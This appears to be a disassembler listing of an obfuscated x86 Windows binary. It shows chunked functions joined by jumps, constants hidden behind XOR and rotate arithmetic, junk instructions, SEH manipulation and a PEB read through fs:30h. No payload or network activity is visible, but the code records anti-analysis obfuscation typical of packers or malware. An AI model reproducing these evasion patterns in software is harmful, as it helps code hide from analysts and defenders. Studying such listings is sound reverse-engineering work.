; START OF FUNCTION CHUNK FOR sub_42B3C2
loc_426940: ; CODE XREF: sub_42B3C2-5E4�j
call sub_424707
loc_426945: ; CODE XREF: _0182ofla:00428295�j
jnp loc_4264DD
jnz loc_42B404
jmp loc_42E533
; END OF FUNCTION CHUNK FOR sub_42B3C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424707
loc_426956: ; CODE XREF: sub_424707+40F0�j
pop ebx
mov eax, offset loc_427B44
xchg eax, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_424707
; ---------------------------------------------------------------------------
loc_426960: ; CODE XREF: _0182ofla:0042DD15�j
jb loc_425C42
; START OF FUNCTION CHUNK FOR sub_429E52
loc_426966: ; CODE XREF: sub_429E52-8D5�j
xor eax, 881C34EBh
add eax, ebp
add eax, 0D9C0929Ah
cmp dword ptr [eax], 47424454h
jz loc_42595F
jmp loc_4260F6
; END OF FUNCTION CHUNK FOR sub_429E52
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D430
loc_426985: ; CODE XREF: sub_42D430:loc_42B2EF�j
add ebx, 0C6B1C798h
xchg ebx, [esp+0]
jmp loc_42A2CF
; END OF FUNCTION CHUNK FOR sub_42D430
; =============== S U B R O U T I N E =======================================
sub_426993 proc near ; CODE XREF: sub_424533+7�p
; FUNCTION CHUNK AT 0042459E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00425CB7 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042A650 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E53D SIZE 00000012 BYTES
xchg ecx, [esp+0]
mov ecx, [esp+0]
cmp ds:dword_423190, 0
jnz loc_42459E
jmp loc_42A650
sub_426993 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
sub eax, ebx
jmp sub_42340D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_4269B2: ; CODE XREF: sub_423A2A:loc_42427E�j
; sub_423A2A+6B3B�j
push offset loc_42A28D
jmp nullsub_64
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4269BC: ; CODE XREF: sub_42798F:loc_42AA24�j
push eax
ror eax, 15h
loc_4269C0: ; CODE XREF: sub_425A93+8187�j
mov ds:dword_427A34, eax
retn
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A93
loc_4269C7: ; CODE XREF: sub_425A93+E�j
; sub_42798F+3F�j
rol eax, 15h
jmp loc_427A58
; END OF FUNCTION CHUNK FOR sub_425A93
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_4269CF: ; CODE XREF: sub_428EB9:loc_426713�j
push offset sub_4299D4
jmp nullsub_60
; END OF FUNCTION CHUNK FOR sub_428EB9
; =============== S U B R O U T I N E =======================================
sub_4269D9 proc near ; CODE XREF: _0182ofla:004298B1�j
; sub_42B500:loc_42A237�p
mov [esp+0], ecx
pop ecx
cmp dword ptr [eax], 0
jnz loc_42967F
jmp sub_42966F
sub_4269D9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42966F
loc_4269EB: ; CODE XREF: sub_42966F:loc_42967F�j
push eax
push 0
call sub_425305
jmp loc_4275BD
; END OF FUNCTION CHUNK FOR sub_42966F
; ---------------------------------------------------------------------------
loc_4269F8: ; CODE XREF: _0182ofla:00429CF1�j
not edi
; =============== S U B R O U T I N E =======================================
sub_4269FA proc near ; CODE XREF: sub_424F35+28F2�p
mov [esp+0], eax
pop eax
add eax, 0F59A7C88h
call sub_423D9E
loc_426A09: ; CODE XREF: sub_42D935-74F5�j
jmp sub_42D71D
sub_4269FA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F46
loc_426A0E: ; CODE XREF: sub_428F46-3D51�j
mov edx, eax
cdq
loc_426A11: ; CODE XREF: sub_428F46:loc_425998�j
call sub_429BB9
mov edx, 0A70158B4h
call sub_42D71D
push eax
jmp loc_429583
; END OF FUNCTION CHUNK FOR sub_428F46
; ---------------------------------------------------------------------------
loc_426A26: ; DATA XREF: sub_42DE3A+518�o
push dword ptr [ebp+8]
call eax ; ExitProcess
mov [ebp-4], eax
jmp loc_42A79E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429D83
loc_426A33: ; CODE XREF: sub_429D83+5�j
push offset sub_428E4B
jmp loc_427A28
; END OF FUNCTION CHUNK FOR sub_429D83
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_234. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42537E
loc_426A3E: ; CODE XREF: sub_42537E+7179�j
jmp loc_4275AB
; END OF FUNCTION CHUNK FOR sub_42537E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D33D
loc_426A43: ; CODE XREF: sub_42D33D:loc_42B0C9�j
xchg ebp, ecx
; END OF FUNCTION CHUNK FOR sub_42D33D
; START OF FUNCTION CHUNK FOR sub_424184
loc_426A45: ; CODE XREF: sub_424184+5787�j
not ecx
jmp loc_42559A
; END OF FUNCTION CHUNK FOR sub_424184
; ---------------------------------------------------------------------------
cmp edi, esi
jmp loc_427054
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_426A53: ; CODE XREF: sub_4282B8+4140�j
jg nullsub_49
loc_426A59: ; CODE XREF: sub_4282B8:loc_425081�j
pop large dword ptr fs:0
add esp, 4
push 0E100A85Ah
pop eax
sub eax, 0F6435F83h
xor eax, 0EABD4887h
call sub_4265C0
jmp loc_42A120
; END OF FUNCTION CHUNK FOR sub_4282B8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426A7F proc near ; DATA XREF: sub_42CA29:loc_42E149�o
; FUNCTION CHUNK AT 004235F0 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00426753 SIZE 00000005 BYTES
push ebp
mov ebp, esp
call sub_424E6E
loc_426A87: ; CODE XREF: sub_423A2A+87A1�j
jnz loc_4235F0
loc_426A8D: ; CODE XREF: sub_428A39+62A3�j
jmp nullsub_29
sub_426A7F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426319
loc_426A92: ; CODE XREF: sub_426319+21B5�j
jmp loc_4283D7
; END OF FUNCTION CHUNK FOR sub_426319
; ---------------------------------------------------------------------------
test edx, ebp
jmp loc_42585F
; ---------------------------------------------------------------------------
loc_426A9E: ; CODE XREF: _0182ofla:0042C832�j
mov byte ptr [ebp-803h], 0
mov byte ptr [ebp-802h], 0
mov byte ptr [ebp-801h], 1
loc_426AB3: ; CODE XREF: _0182ofla:loc_427C7E�j
push offset sub_424498
jmp locret_42C54D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_69. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42445E
loc_426ABE: ; CODE XREF: sub_42445E+9173�j
jmp loc_42C881
; END OF FUNCTION CHUNK FOR sub_42445E
; ---------------------------------------------------------------------------
loc_426AC3: ; CODE XREF: _0182ofla:00428FD1�j
cmp ebp, 838B6D30h
jmp loc_428723
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D6C7
loc_426ACE: ; CODE XREF: sub_42D6C7+11�j
cmp dword ptr [ebp-4], 0
jz loc_425EE4
call nullsub_9
; END OF FUNCTION CHUNK FOR sub_42D6C7
; START OF FUNCTION CHUNK FOR sub_4256AD
loc_426ADD: ; CODE XREF: sub_428D63-2807�j
; sub_4256AD+8015�j
jno loc_429527
xor eax, eax
jmp loc_4259BC
; END OF FUNCTION CHUNK FOR sub_4256AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B3C2
loc_426AEA: ; CODE XREF: sub_42B3C2+6�j
mov fs:0, esp
loc_426AF0: ; CODE XREF: _0182ofla:loc_428723�j
jmp loc_429E8F
; END OF FUNCTION CHUNK FOR sub_42B3C2
; ---------------------------------------------------------------------------
loc_426AF5: ; CODE XREF: _0182ofla:0042A168�j
jns loc_42DF5C
jl nullsub_89
; =============== S U B R O U T I N E =======================================
sub_426B01 proc near ; CODE XREF: _0182ofla:004268A9�p
; FUNCTION CHUNK AT 00424EDD SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00425B4D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004285CE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A4C1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D471 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042E07A SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
jmp loc_4285CE
sub_426B01 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_426B0A: ; CODE XREF: sub_425DA5+4410�j
test al, al
jz nullsub_34
push ebx
push 0DF6C8C1Bh
pop ebx
jmp loc_428696
; END OF FUNCTION CHUNK FOR sub_425DA5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427445
loc_426B1E: ; CODE XREF: sub_427445:loc_427FD5�j
add edi, edx
sbb esi, 8508B10Ah
pop edi
shl esi, 13h
mov ebx, [eax]
jmp loc_42B7E2
; END OF FUNCTION CHUNK FOR sub_427445
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424BCB
loc_426B31: ; CODE XREF: sub_424BCB:loc_42AA18�j
jz loc_42A7D0
jmp loc_42DBCD
; END OF FUNCTION CHUNK FOR sub_424BCB
; ---------------------------------------------------------------------------
mov ebp, [ebx]
adc ebx, 39DAC2ADh
jmp sub_42E278
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E18E
loc_426B49: ; CODE XREF: sub_42E18E:loc_423D1E�j
js loc_4264B8
mov edi, [ecx]
xchg eax, [edx]
; END OF FUNCTION CHUNK FOR sub_42E18E
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_426B53: ; CODE XREF: sub_4298DD:loc_427315�j
add esi, 0F2CB3843h
mov [esi], ecx
jmp loc_4264B8
; END OF FUNCTION CHUNK FOR sub_4298DD
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426B60 proc near ; CODE XREF: sub_429071+11�p
var_C = dword ptr -0Ch
xchg ebp, ebx
push ebx
xchg ebp, ebx
mov ebp, esp
add esp, 0FFFFFF90h
call sub_428B0C
loc_426B6F: ; CODE XREF: sub_42794C:loc_42795C�j
mov [ebp+var_C], eax
jmp loc_42EABE
sub_426B60 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EAB7
loc_426B77: ; CODE XREF: sub_42EAB7:loc_42D607�j
call sub_42349B
; END OF FUNCTION CHUNK FOR sub_42EAB7
; START OF FUNCTION CHUNK FOR sub_4255E9
loc_426B7C: ; CODE XREF: sub_4255E9+30B5�j
push eax
retn
; END OF FUNCTION CHUNK FOR sub_4255E9
; ---------------------------------------------------------------------------
loc_426B7E: ; CODE XREF: _0182ofla:004249BA�j
jmp loc_427067
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426B83 proc near ; CODE XREF: sub_42D888+4�p
push ebp
mov ebp, esp
call sub_42A420
loc_426B8B: ; CODE XREF: sub_428F0F+56DE�j
jmp loc_424009
sub_426B83 endp
; ---------------------------------------------------------------------------
loc_426B90: ; CODE XREF: _0182ofla:loc_42D1ED�j
jnz loc_42D79F
jmp loc_42C104
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_426B9B: ; CODE XREF: sub_42798F:loc_426D18�j
test byte ptr [eax-10h], 38h
call sub_424C61
loc_426BA4: ; CODE XREF: sub_427445+6323�j
jmp loc_427309
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423861
loc_426BA9: ; CODE XREF: sub_423861+5741�j
jmp loc_42A06F
; END OF FUNCTION CHUNK FOR sub_423861
; ---------------------------------------------------------------------------
or eax, ecx
jmp sub_429A64
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_198. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42326C
loc_426BB6: ; CODE XREF: sub_42326C+9846�j
jmp loc_42E41E
; END OF FUNCTION CHUNK FOR sub_42326C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424072
loc_426BBB: ; CODE XREF: sub_424072:loc_42679E�j
sub ebx, 10000h
mov eax, [ebx]
neg eax
cmp ax, 0A5B3h
jmp loc_427CB3
; END OF FUNCTION CHUNK FOR sub_424072
; =============== S U B R O U T I N E =======================================
sub_426BCE proc near ; DATA XREF: _0182ofla:00425BC9�o
; FUNCTION CHUNK AT 00425FF9 SIZE 00000005 BYTES
mov eax, [eax]
push offset sub_427DFA
jmp loc_425FF9
sub_426BCE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426BDA proc near ; CODE XREF: sub_427AD5:loc_425FEF�p
; FUNCTION CHUNK AT 00428399 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A3F1 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042B4EE SIZE 00000005 BYTES
xchg ecx, [esp+0]
mov ecx, [esp+0]
mov ecx, ebp
xchg ecx, [esp+0]
mov ebp, esp
push ecx
mov esp, ebp
loc_426BEA: ; CODE XREF: sub_42537E:loc_42958F�j
pop ebp
jmp loc_428399
sub_426BDA endp
; ---------------------------------------------------------------------------
and ebx, 86D8D4D1h
jmp sub_423FE2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42938A
loc_426BFB: ; CODE XREF: sub_42938A-4CA9�j
add edi, esi
loc_426BFD: ; CODE XREF: sub_42938A:loc_427D3C�j
push esi
push 0E686BFC8h
pop esi
jmp loc_42B8D4
; END OF FUNCTION CHUNK FOR sub_42938A
; ---------------------------------------------------------------------------
call sub_4235A0
push edx
push 5CEA7B3Eh
pop edx
or edx, 361ECD6h
add edx, 0A056CBACh
jmp loc_425F86
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_426C26: ; CODE XREF: sub_4253F4+5EC4�j
mov [edx], ecx
loc_426C28: ; CODE XREF: sub_4243D3:loc_42E299�j
push esi
push 7EF1B5F3h
pop esi
and esi, 0D51408DCh
or esi, 847FEF1Ch
jmp loc_42E075
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
loc_426C40: ; CODE XREF: _0182ofla:0042727C�j
sub ecx, esi
xor ebx, ebp
push 181B542Bh
; START OF FUNCTION CHUNK FOR sub_427259
loc_426C49: ; CODE XREF: _0182ofla:loc_42726F�j
; sub_427259:loc_428A9B�j
and ecx, 0F6DCE1A6h
cmp ecx, 162A346Ch
jmp loc_4273CA
; END OF FUNCTION CHUNK FOR sub_427259
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E43C
loc_426C5A: ; CODE XREF: sub_42E43C+11�j
jge loc_423554
sub ebp, 605E25F0h
mov ebp, 0F6A7D437h
jmp loc_42773B
; END OF FUNCTION CHUNK FOR sub_42E43C
; ---------------------------------------------------------------------------
loc_426C70: ; DATA XREF: sub_423FFB:loc_424009�o
mov eax, ds:dword_4257A4
mov [ebp-4], eax
mov eax, [ebp-4]
mov esp, ebp
jmp loc_42D2D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427942
loc_426C82: ; CODE XREF: sub_427942+5�j
push 1685B06Dh
pop eax
xor eax, 0E4F52610h
add eax, ebp
add eax, 0D8F698Bh
mov eax, [eax]
call sub_427906
loc_426C9D: ; CODE XREF: sub_42B15E-3F0B�j
jmp loc_42AD86
; END OF FUNCTION CHUNK FOR sub_427942
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_426CA2: ; CODE XREF: sub_4298DD-3163�j
jmp loc_42492F
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42940E
loc_426CA7: ; CODE XREF: sub_42940E+3A2A�j
mov [eax], edi
mov ecx, esi
shl edx, 17h
jmp loc_427BFB
; END OF FUNCTION CHUNK FOR sub_42940E
; ---------------------------------------------------------------------------
mov edx, 1F56AC7Bh
call sub_42D333
; START OF FUNCTION CHUNK FOR sub_429A64
loc_426CBD: ; CODE XREF: sub_429A64+1B�j
jmp loc_425C49
; END OF FUNCTION CHUNK FOR sub_429A64
; ---------------------------------------------------------------------------
loc_426CC2: ; CODE XREF: _0182ofla:00428BAF�j
pushf
; =============== S U B R O U T I N E =======================================
sub_426CC3 proc near ; CODE XREF: sub_423A2A:loc_425A13�p
mov [esp+0], edx
pop edx
push esi
call sub_42E79C
loc_426CCD: ; CODE XREF: sub_42E689-1D17�j
jmp nullsub_30
sub_426CC3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_426CD2: ; CODE XREF: sub_42798F-2AB7�j
jnz loc_42810B
add edx, esi
jmp loc_4247E7
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
xor esi, 0D5BBFCCBh
jmp sub_423BE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42662C
loc_426CEA: ; CODE XREF: sub_42662C+41�j
jns loc_4251A5
mov [ebx], edi
or esi, ebp
jmp loc_42D73E
; END OF FUNCTION CHUNK FOR sub_42662C
; =============== S U B R O U T I N E =======================================
sub_426CF9 proc near ; CODE XREF: _0182ofla:00428192�j
; sub_42433C+8AA3�p
xchg eax, [esp+0]
pop eax
rol edx, 5
xor edx, ebp
push offset loc_427FF2
jmp nullsub_31
sub_426CF9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A260
loc_426D0C: ; CODE XREF: sub_42A260:loc_423D82�j
pop edx
; END OF FUNCTION CHUNK FOR sub_42A260
; START OF FUNCTION CHUNK FOR sub_4276BF
loc_426D0D: ; CODE XREF: sub_4276BF-2DB0�j
; sub_4276BF+19�j
jnb loc_4248F9
call sub_42393D
; END OF FUNCTION CHUNK FOR sub_4276BF
; START OF FUNCTION CHUNK FOR sub_42798F
loc_426D18: ; CODE XREF: _0182ofla:00427934�j
; sub_42798F+567E�j
jmp loc_426B9B
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
xor esi, eax
jmp sub_423EB3
; ---------------------------------------------------------------------------
loc_426D24: ; DATA XREF: _0182ofla:00429744�o
push 0A7D8E9A9h
pop edi
push offset sub_42B640
jmp loc_425B8C
; ---------------------------------------------------------------------------
loc_426D34: ; DATA XREF: _0182ofla:00424650�o
push 3E4C4F78h
pop edx
and edx, 684B70ACh
test edx, 8000h
jmp loc_426144
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_51. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
locret_426D4C: ; CODE XREF: _0182ofla:loc_42A52D�j
retn
; ---------------------------------------------------------------------------
loc_426D4D: ; CODE XREF: _0182ofla:00423635�j
jmp loc_42728B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_179. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42461C
loc_426D53: ; CODE XREF: sub_42461C+A707�j
rol eax, 9
push edx
mov [esp+0], eax
retn
; END OF FUNCTION CHUNK FOR sub_42461C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DA65
loc_426D5B: ; CODE XREF: sub_42DA65-7285�j
jmp loc_4279AA
; END OF FUNCTION CHUNK FOR sub_42DA65
; ---------------------------------------------------------------------------
loc_426D60: ; CODE XREF: _0182ofla:loc_42C104�j
jno loc_42405E
and esi, edi
jmp loc_42D79F
; ---------------------------------------------------------------------------
rol ecx, 12h
shr ebx, 1
jmp sub_42E825
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D03E
loc_426D77: ; CODE XREF: sub_42D03E-832E�j
pop ebx
push offset sub_42CCE0
jmp loc_42ADB0
; END OF FUNCTION CHUNK FOR sub_42D03E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A39
loc_426D82: ; CODE XREF: sub_42AB27:loc_424CA3�j
; sub_428A39-37C1�j
jge loc_42CD9A
loc_426D88: ; CODE XREF: sub_424080+11�j
jmp loc_423921
; END OF FUNCTION CHUNK FOR sub_428A39
; ---------------------------------------------------------------------------
xchg edi, [ecx]
not edx
add edi, eax
jmp loc_42CD94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4243D3
loc_426D98: ; CODE XREF: sub_4243D3+E�j
jle loc_42D884
jmp loc_42C1DB
; END OF FUNCTION CHUNK FOR sub_4243D3
; ---------------------------------------------------------------------------
loc_426DA3: ; DATA XREF: sub_429A64-1C3E�o
mov [ebp-8], eax
jmp loc_425C49
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_426DAB: ; CODE XREF: sub_425B00:loc_428939�j
test byte ptr [ebp-8], 8
jz loc_42AFA1
push ebp
mov eax, [ebp-20h]
call sub_42D387
jmp loc_42D37E
; END OF FUNCTION CHUNK FOR sub_425B00
; =============== S U B R O U T I N E =======================================
sub_426DC3 proc near ; CODE XREF: sub_4261C9+3�j
; FUNCTION CHUNK AT 0042B0CE SIZE 00000005 BYTES
add esp, 0FFFFFFF4h
push offset loc_428963
jmp loc_42B0CE
sub_426DC3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_426DD0: ; CODE XREF: sub_42798F+615B�j
jnz loc_428A87
jmp loc_428183
; END OF FUNCTION CHUNK FOR sub_42798F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_219. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231F3
loc_426DDC: ; CODE XREF: sub_4231F3+4BFC�j
jmp loc_42E46E
; END OF FUNCTION CHUNK FOR sub_4231F3
; ---------------------------------------------------------------------------
test al, al
jz loc_4245A8
jmp loc_42ACE2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_426DEE: ; CODE XREF: sub_42D056-276C�j
push ecx
jmp loc_428D92
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CA29
loc_426DF4: ; CODE XREF: sub_42CA29-2F8�j
jno loc_42B0A9
loc_426DFA: ; CODE XREF: sub_4276BF:loc_429966�j
push offset loc_423264
jmp nullsub_106
; END OF FUNCTION CHUNK FOR sub_42CA29
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_426E04: ; CODE XREF: sub_42B15E+2029�j
xor eax, 0E8517B05h
test eax, 400000h
jmp loc_42749B
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E825
loc_426E15: ; CODE XREF: sub_42E825+9�j
call sub_42E395
; END OF FUNCTION CHUNK FOR sub_42E825
; START OF FUNCTION CHUNK FOR sub_42AC07
loc_426E1A: ; CODE XREF: sub_42AC07+D�j
or eax, eax
jnz loc_42C6DB
jmp loc_423095
; END OF FUNCTION CHUNK FOR sub_42AC07
; ---------------------------------------------------------------------------
loc_426E27: ; CODE XREF: _0182ofla:loc_42E92D�j
xor esi, edx
add ebx, eax
test ebp, ecx
jmp loc_4234F0
; ---------------------------------------------------------------------------
loc_426E32: ; DATA XREF: sub_42D6DD:loc_423F9B�o
add eax, [esp]
adc edx, [esp+4]
; START OF FUNCTION CHUNK FOR sub_426571
loc_426E39: ; CODE XREF: sub_426571+B22�j
add esp, 8
mov [ebp-4], eax
jmp loc_428E15
; END OF FUNCTION CHUNK FOR sub_426571
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_426E44 proc near ; CODE XREF: sub_426571-295E�p
; sub_426571+B2A�p
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424F6C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042C128 SIZE 00000005 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFD8h
mov [ebp+var_20], eax
jmp loc_424F6C
sub_426E44 endp
; ---------------------------------------------------------------------------
loc_426E52: ; CODE XREF: _0182ofla:loc_423841�j
add eax, 0A05A59A7h
call sub_428718
loc_426E5D: ; CODE XREF: _0182ofla:loc_42B20E�j
ror ebx, 1Ah
jmp loc_425D19
; ---------------------------------------------------------------------------
loc_426E65: ; CODE XREF: _0182ofla:00423002�j
push 0DBB59233h
; =============== S U B R O U T I N E =======================================
sub_426E6A proc near ; CODE XREF: sub_428245-194�p
; FUNCTION CHUNK AT 0042A409 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042B331 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042E4FB SIZE 0000001B BYTES
mov [esp+0], eax
pop eax
push edi
jmp loc_42B331
sub_426E6A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42931E
loc_426E74: ; CODE XREF: sub_42931E:loc_4261BB�j
mov eax, [ebp-14h]
call sub_42C7FE
loc_426E7C: ; CODE XREF: sub_42CE73:loc_4266ED�j
push 4C91A0h
push 0EDC16991h
pop eax
xor eax, 0E8C401F8h
jmp loc_4263E6
; END OF FUNCTION CHUNK FOR sub_42931E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_171. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_426E93: ; CODE XREF: _0182ofla:00426281�j
rol edi, 0Eh
; =============== S U B R O U T I N E =======================================
sub_426E96 proc near ; CODE XREF: sub_42A181-592F�p
xchg ebx, [esp+0]
pop ebx
mov eax, large fs:30h
call sub_4282B8
loc_426EA6: ; CODE XREF: _0182ofla:0042441C�j
rol edx, 1Ch
sub_426E96 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_426EA9 proc near ; CODE XREF: sub_42B15E-19EC�p
; FUNCTION CHUNK AT 0042E489 SIZE 00000005 BYTES
mov [esp+0], edx
pop edx
pop ecx
xor eax, eax
jmp loc_42E489
sub_426EA9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
not ebp
jmp sub_42D935
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_170. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F50
loc_426EBD: ; CODE XREF: sub_423F50+963C�j
jmp nullsub_158
; END OF FUNCTION CHUNK FOR sub_423F50
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42349B
loc_426EC2: ; CODE XREF: sub_42349B+6223�j
jmp loc_423A9A
; END OF FUNCTION CHUNK FOR sub_42349B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4254D3
loc_426EC7: ; CODE XREF: sub_4254D3+F�j
jmp loc_425DC5
; END OF FUNCTION CHUNK FOR sub_4254D3
; ---------------------------------------------------------------------------
popf
mov [eax], esi
jmp sub_424289
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_87. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42583B
loc_426ED5: ; CODE XREF: sub_42583B+6F3B�j
jmp loc_42916F
; END OF FUNCTION CHUNK FOR sub_42583B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_426EDA: ; CODE XREF: sub_42660C:loc_42B490�j
pop esi
add esi, 32DD681Eh
call sub_42364C
; END OF FUNCTION CHUNK FOR sub_42660C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_169. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_426EE7: ; CODE XREF: _0182ofla:0042A4F3�j
jmp loc_4283D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429BEC
loc_426EEC: ; CODE XREF: sub_429BEC+4�j
push ecx
mov ecx, [esp+4+arg_8]
mov dword ptr [ecx], 10001h
lea eax, loc_42DD4D
push ebx
jmp loc_425264
; END OF FUNCTION CHUNK FOR sub_429BEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424707
loc_426F03: ; CODE XREF: sub_424707+5831�j
push eax
push 386E33C5h
pop eax
rol eax, 0Ah
jb loc_4287EB
jmp loc_429B10
; END OF FUNCTION CHUNK FOR sub_424707
; ---------------------------------------------------------------------------
loc_426F18: ; CODE XREF: _0182ofla:0042CF8E�j
jmp loc_42A4F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427239
loc_426F1D: ; CODE XREF: sub_427239+53A7�j
jmp loc_424671
; END OF FUNCTION CHUNK FOR sub_427239
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D02D
loc_426F22: ; CODE XREF: sub_42D02D-1C33�j
jmp loc_423678
; END OF FUNCTION CHUNK FOR sub_42D02D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_426F27: ; CODE XREF: sub_428EB9+B39�j
jmp loc_42E9D6
; END OF FUNCTION CHUNK FOR sub_428EB9
